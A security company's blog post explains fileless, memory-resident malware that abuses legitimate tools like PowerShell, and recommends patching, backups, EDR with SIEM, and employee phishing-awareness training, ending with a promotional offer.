Living off the Land – Fileless Malware

Published On: February 9, 2021By

The general operating procedure for removing malware is to detect it with anti-viral software, attempt to disinfect the asset, scan again, and, if all else fails, re-image the asset to remove all traces of infection.  However, what happens when you cannot detect the infection for months or even years?

Malware and anti-viral software makers have been locked in an arms race of sorts since the late 1980s. The goal of malware makers to stay ahead of anti-viral software detection efforts.  This battle is usually fought through files stored on the asset’s hard drive.  If you examine your anti-viral software while it is scanning, you’ll see it examines your files one at a time against a definitions file.  This file is constantly updated with the latest information on suspected malware.  However, as the detection tools have become more thorough and complex, so have the means by which malware hides itself.

Sneaking past detection tools

By using fileless malware, attackers have been able to circumnavigate the most common detection tools.  Unlike regular malware that hides in the code of programs waiting to be used, fileless malware hides within the asset’s operating memory rather than hard drive storage.  This makes it much hard for anti-malware programs to detect the so-called malware ‘footprint’ that often remains on programs within the hard drive’s storage space.

All programs need to be activated by a user or an automated process.  However, since fileless malware is not associated with any storage program, traditional detection methods will not work.  To make matters worse, fileless malware often uses legitimate programs to execute its purpose.  For example, code injected into Windows machine memory may force PowerShell to perform malicious activity on the system registry.  The results could range from a confidential data leak to the beginning of a ransomware attack.  This use of legitimate programs to execute nefarious attacks is called ‘living off the land’ and it is a growing concern among cybersecurity experts.

Interestingly, the most common method used for fileless malware introduction is the same as for the common variety: social engineering.  It is important to remember that despite the continual development of malware and related programs, the majority of cyber attacks still occur as the result of human error.  This means the largest attack vector for fileless malware are activities such as credential harvesting and phishing.  Because of this, the adage holds true that the best offense against fileless malware is a good defense.  Given the reduced reliability of traditional detection tools, defense must focus around two key points: prevention and awareness.

In looking at prevention, the easiest thing to do is ensure your patching and backup strategies are up-to-date.  Patching is important for legitimate programs such as PowerShell to prevent them from becoming susceptible to memory-based attacks.

Other preventative measures

Another important preventative measure is endpoint detection and response (EDR), which provides continuous monitoring.  This monitoring looks for malicious events rather than footprints.  For example, if a fileless malware attack is able to force PowerShell to make continuous changes to the Windows Registry, ERD might recognize these events.  However, this monitoring generates a lot of log data, so it would be prudent to pair ERD with a reputable Security Information and Event Management (SIEM) system.  This allows you to sift through the log data quickly to find nefarious system events indicative of an attack.

Even if an attack is detected, correcting the issue can be difficult.  Like common malware, fileless malware works by modifying your system to perform the desired effect of a breach or disruption.  In the process, the asset or the data it contains could become corrupted.  Therefore, having up-to-date and ready to deploy backups are an important preventative measure.  If you do find fileless malware has struck, a system purge is the only sure-fire way to ensure it does not have a lingering system effect. The only way to safely execute a purge is ensure you have adequate backups ready to deploy as fast as possible.

Cybersecurity training is critical

As fileless malware threats continue to grow, prevention rather than detection is more likely to stop an eventual attack.  Though patching and backups can help keep your assets secure, even the best technical plans can be undone by one well-placed phishing e-mail.  Fileless malware may be harder to detect than the more common variety, however, it still uses the same attack vectors to infect its target.

90% of all breaches start with some form of social engineering, which is why cybersecurity awareness must be a part of your defense strategy.  Training employees to recognize and be comfortable reporting suspicious activity is a critical step in stopping malware.  Employees should understand that reporting activity, even admitting fault, are important to protecting the company’s cyber assets.  An employee keeping an accidental click on a phishing e-mail to themselves could be as dangerous as a malware program itself.

An uptick in fileless malware

Fileless malware has been around much longer than many realize, and it is only recently that cybersecurity practitioners have seen an uptick in its use.  It is not easy to deploy and harder to keep in place, given the volatility of computer memory.  However, we have now reached a point when traditional malware no longer seems to be cutting it for attackers.  They need to find new tricks to stay hidden and “living off the land” seem like a perfect way to do it.

Fileless malware is hard to detect and even harder to mitigate since you may not be sure what changes it has made to your legitimate programs and processes.  This is why it’s important to approach the problem from the technological perspective as well as the perspective of your front-line users.  There may be no sure-fire way to prevent an infection, but a forward-thinking prevention and awareness program can keep your company safe and your employees productive.

Discover your system’s vulnerabilities before cyber criminals do

Infoaxis has long operated with a security first mindset. Discovery is the first step in our Cybersecurity Roadmap to your organization becoming more secure. Take our no-cost Discovery assessment and get a comprehensive view of your current vulnerabilities – not just in your organization’s network but across your entire business. Learn more>>>

About the Author:

Joshua Silberman, CISSP, CCSP, CISA, is a cybersecurity leader responsible for the direction, design, and development of Cloud Transformation and Cybersecurity at Infoaxis.

Share This :